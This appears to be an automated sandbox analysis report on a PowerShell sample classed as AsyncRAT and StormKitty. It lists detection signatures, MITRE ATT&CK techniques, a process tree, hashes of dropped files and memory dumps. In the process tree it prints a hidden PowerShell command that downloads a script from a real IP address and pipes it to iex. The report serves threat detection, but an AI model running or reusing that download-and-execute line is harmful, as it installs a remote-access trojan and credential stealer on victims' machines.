asyncrat | ae7811c08d45da31fecb2a31c6491459765667f12bc187abaf40db75755e4b1a

Resubmissions

02-01-2025 15:41

250102-s4q41awrh1 8

02-01-2025 15:38

250102-s248vazkgq 10

Analysis

max time kernel
90s
max time network
94s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-it
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-itlocale:it-itos:windows10-ltsc 2021-x64systemwindows
submitted
02-01-2025 15:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

malicious_script_1.ps1
Size

2KB
MD5

a19cff86bcb8ba356ca034582a53f870
SHA1

d9a1cf4e9125ab420ebb614f67cb81c6efed1afb
SHA256

ae7811c08d45da31fecb2a31c6491459765667f12bc187abaf40db75755e4b1a
SHA512

4c5e9fb74d890d1b69f1ebc2fc5daae20229f69bee3f4a1e26b8f9465812f39555de5e15dcbda7b1fc3a6c6042dca05d57b4591cd2f545935d8d5e4a75d4e9a6

Score

10^/10

asyncrat stormkitty discovery execution rat stealer

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral1/memory/4804-68-0x0000000000400000-0x0000000000704000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Blocklisted process makes network request 2 IoCs

flow	pid	Process
12	4564	powershell.exe
16	704	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
704	powershell.exe
4564	powershell.exe

Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
468	Package.exe

Loads dropped DLL 1 IoCs

pid	Process
468	Package.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 704 set thread context of 4804	704	powershell.exe	98

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Package.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
4564	powershell.exe
4564	powershell.exe
4564	powershell.exe
4564	powershell.exe
704	powershell.exe
704	powershell.exe
704	powershell.exe
704	powershell.exe
704	powershell.exe
704	powershell.exe
4804	RegAsm.exe
4804	RegAsm.exe
4804	RegAsm.exe
4804	RegAsm.exe
4804	RegAsm.exe
4804	RegAsm.exe
4804	RegAsm.exe
4804	RegAsm.exe
4804	RegAsm.exe
4804	RegAsm.exe
4804	RegAsm.exe
4804	RegAsm.exe
4804	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4564	powershell.exe
Token: SeDebugPrivilege	704	powershell.exe
Token: SeDebugPrivilege	4804	RegAsm.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
468	Package.exe
468	Package.exe
468	Package.exe
4804	RegAsm.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 4564 wrote to memory of 1176	4564	powershell.exe	83
PID 4564 wrote to memory of 1176	4564	powershell.exe	83
PID 1176 wrote to memory of 468	1176	cmd.exe	84
PID 1176 wrote to memory of 468	1176	cmd.exe	84
PID 1176 wrote to memory of 468	1176	cmd.exe	84
PID 468 wrote to memory of 2064	468	Package.exe	87
PID 468 wrote to memory of 2064	468	Package.exe	87
PID 468 wrote to memory of 2064	468	Package.exe	87
PID 2064 wrote to memory of 704	2064	cmd.exe	89
PID 2064 wrote to memory of 704	2064	cmd.exe	89
PID 2064 wrote to memory of 704	2064	cmd.exe	89
PID 704 wrote to memory of 4692	704	powershell.exe	93
PID 704 wrote to memory of 4692	704	powershell.exe	93
PID 704 wrote to memory of 4692	704	powershell.exe	93
PID 4692 wrote to memory of 5016	4692	csc.exe	94
PID 4692 wrote to memory of 5016	4692	csc.exe	94
PID 4692 wrote to memory of 5016	4692	csc.exe	94
PID 704 wrote to memory of 4348	704	powershell.exe	96
PID 704 wrote to memory of 4348	704	powershell.exe	96
PID 704 wrote to memory of 4348	704	powershell.exe	96
PID 704 wrote to memory of 672	704	powershell.exe	97
PID 704 wrote to memory of 672	704	powershell.exe	97
PID 704 wrote to memory of 672	704	powershell.exe	97
PID 704 wrote to memory of 4804	704	powershell.exe	98
PID 704 wrote to memory of 4804	704	powershell.exe	98
PID 704 wrote to memory of 4804	704	powershell.exe	98
PID 704 wrote to memory of 4804	704	powershell.exe	98
PID 704 wrote to memory of 4804	704	powershell.exe	98
PID 704 wrote to memory of 4804	704	powershell.exe	98
PID 704 wrote to memory of 4804	704	powershell.exe	98
PID 704 wrote to memory of 4804	704	powershell.exe	98

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\malicious_script_1.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4564
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1176
- - C:\Windows\Temp\Package.exe
    C:\Windows\Temp\Package.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:468
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2064
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:704
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vkbtn0s5\vkbtn0s5.cmdline"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4692
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB064.tmp" "c:\Users\Admin\AppData\Local\Temp\vkbtn0s5\CSC4B2D3C82E3784210A5C31BC56C56F42.TMP"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5016
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4348
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:672
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4f26d2badd4912bdd05fa1bece1ae666

SHA1
703da699d982f6e03e9152fe8866ab872484f68d

SHA256
f5f46a20585563bdaa087ac635b48b1661a3d03077251ff02ae0eb8c7c397bf9

SHA512
87a0350c06f43c32b384230b5d1d9a42c9acfcecf793982e6477c7a2009ac420d639c984656f255f887c435dbcf4728ce000ee57ce16e43f4e40024daa566c21

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB064.tmp

Filesize
1KB

MD5
33293b528758bf8370622acde4a702a1

SHA1
13b329e0442dd361b1fe6b02a3393402c958f71c

SHA256
467cb84c67aa506be6ad08318e0054b14d3c486056f0cf748bc804adf5a486ee

SHA512
f731b4a76416df75a206d09c8c89e97f0dd19eae61413bc2153073b9f3399676f85a6b428a4804e698feb42983d1bcc3dc82b82862d49e922c01f76cb3ea9585

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcoefjx0.zmv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\vkbtn0s5\vkbtn0s5.dll

Filesize
9KB

MD5
2ba6999ab64f878f2d4dd466cb83f0db

SHA1
b17043f7ce75c2b3a9148e922742783b4d1bf7fe

SHA256
6ee2d3c8516a26a8c111d17622d590fb6f38e657b7f2241ee147fd31a3eef6ea

SHA512
0e881ea32e08f82ece76dbbdf3e775430c20cb3b3810b64b989009a1f6cd736afcea34cfe771aef0c97085912059e548db7e58fab58c00de8a615515a11bd93c

Download Submit
C:\Windows\Temp\IVIEWERS.DLL

Filesize
88KB

MD5
33ae2b9c3e710254fe2e2ce35ff8a7c8

SHA1
109e32187254b27e04ef18bbe1b48fad42bca841

SHA256
9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68

SHA512
2abe017e2f1d29fe789206d6483b9b33e7abd0871300d678eaba15e390d55c5e197d6cea6ea32dfdee5f65d082574adcc192a4fc0c9506bbba8ad7e957e12599

Download Submit
C:\Windows\Temp\Package.exe

Filesize
201KB

MD5
2696d944ffbef69510b0c826446fd748

SHA1
e4106861076981799719876019fe5224eac2655c

SHA256
a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a

SHA512
c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vkbtn0s5\CSC4B2D3C82E3784210A5C31BC56C56F42.TMP

Filesize
652B

MD5
3c9761bca3129e6059acd11cfe2f6ed1

SHA1
135bb97d81602e91002b9724ca5fb96da760d522

SHA256
b6f1c9e68ca69aedb0f45c0c36a35fb5540d39ab2e9d298c580b2c4c463d2926

SHA512
7b8c77f1f5fca4c14cc9c6f2855343593cff6537623635d540e9dddb87766d22230b223370ff8f27e4159ddeda029746f1ba091065f58dd8a16f58b6567003e5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vkbtn0s5\vkbtn0s5.0.cs

Filesize
10KB

MD5
3fa79decff8805745cea8116d9bb2643

SHA1
92343c5fa2c768b964ae3a4e9136e5d7193e8558

SHA256
e6852a401b53a7af04d57aa1e4fc9621e3dffc1221534142316a27ae67e8f89c

SHA512
5c2879e59fa6609e6e87f70c5237b250a906bf7dd13a343dac9e81635b1fc91ad9374e643a306b99503c52ce9bd56554a64aa132584c732d43ee39fb17305d78

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vkbtn0s5\vkbtn0s5.cmdline

Filesize
204B

MD5
dc8c78cacb80477d26fc452b20afd079

SHA1
a924f4ac075c58b07f16e447280ea74dbdc2b84a

SHA256
527dbd78c74387fe50b4c7e0c6a9019c0960b87fe7619e8514e92a7aaeecef96

SHA512
43e440017b1e913b14164114debc99905e0f14a7439793e23a5ac824d4dd78799af6b247fb8241c85d632f60ab86e0683f958772f61299d60ca500fc10e60ea4

Download Submit
memory/704-44-0x0000000006300000-0x0000000006657000-memory.dmp

Filesize
3.3MB

Download
memory/704-50-0x0000000008070000-0x00000000086EA000-memory.dmp

Filesize
6.5MB

Download
memory/704-66-0x0000000007F10000-0x0000000007F18000-memory.dmp

Filesize
32KB

Download
memory/704-53-0x0000000007F00000-0x0000000007F0E000-memory.dmp

Filesize
56KB

Download
memory/704-52-0x0000000007EB0000-0x0000000007EC4000-memory.dmp

Filesize
80KB

Download
memory/704-29-0x00000000050D0000-0x0000000005106000-memory.dmp

Filesize
216KB

Download
memory/704-30-0x00000000057E0000-0x0000000005EAA000-memory.dmp

Filesize
6.8MB

Download
memory/704-31-0x00000000055F0000-0x0000000005672000-memory.dmp

Filesize
520KB

Download
memory/704-32-0x0000000005780000-0x00000000057A2000-memory.dmp

Filesize
136KB

Download
memory/704-33-0x0000000006120000-0x0000000006186000-memory.dmp

Filesize
408KB

Download
memory/704-34-0x0000000006190000-0x00000000061F6000-memory.dmp

Filesize
408KB

Download
memory/704-51-0x00000000079F0000-0x0000000007A0A000-memory.dmp

Filesize
104KB

Download
memory/704-45-0x00000000060F0000-0x0000000006100000-memory.dmp

Filesize
64KB

Download
memory/704-46-0x0000000006770000-0x0000000006872000-memory.dmp

Filesize
1.0MB

Download
memory/704-49-0x0000000006950000-0x000000000699C000-memory.dmp

Filesize
304KB

Download
memory/704-48-0x0000000006900000-0x000000000691E000-memory.dmp

Filesize
120KB

Download
memory/4564-12-0x0000023033E80000-0x0000023033E90000-memory.dmp

Filesize
64KB

Download
memory/4564-26-0x00007FFA14800000-0x00007FFA152C2000-memory.dmp

Filesize
10.8MB

Download
memory/4564-15-0x00007FFA14800000-0x00007FFA152C2000-memory.dmp

Filesize
10.8MB

Download
memory/4564-16-0x00007FFA14800000-0x00007FFA152C2000-memory.dmp

Filesize
10.8MB

Download
memory/4564-1-0x000002304E730000-0x000002304E7B2000-memory.dmp

Filesize
520KB

Download
memory/4564-14-0x00007FFA14800000-0x00007FFA152C2000-memory.dmp

Filesize
10.8MB

Download
memory/4564-13-0x000002304E9D0000-0x000002304EAD2000-memory.dmp

Filesize
1.0MB

Download
memory/4564-17-0x000002304E6C0000-0x000002304E6D4000-memory.dmp

Filesize
80KB

Download
memory/4564-0-0x00007FFA14803000-0x00007FFA14805000-memory.dmp

Filesize
8KB

Download
memory/4564-20-0x000002304E6E0000-0x000002304E6FE000-memory.dmp

Filesize
120KB

Download
memory/4564-7-0x0000023033E20000-0x0000023033E42000-memory.dmp

Filesize
136KB

Download
memory/4804-68-0x0000000000400000-0x0000000000704000-memory.dmp

Filesize
3.0MB

Download
memory/4804-71-0x0000000005B50000-0x00000000060F6000-memory.dmp

Filesize
5.6MB

Download
memory/4804-72-0x00000000063B0000-0x0000000006442000-memory.dmp

Filesize
584KB

Download
memory/4804-73-0x0000000006310000-0x000000000631A000-memory.dmp

Filesize
40KB

Download
memory/4804-76-0x0000000007360000-0x00000000073FC000-memory.dmp

Filesize
624KB

Download
memory/4804-77-0x00000000076C0000-0x0000000007A17000-memory.dmp

Filesize
3.3MB

Download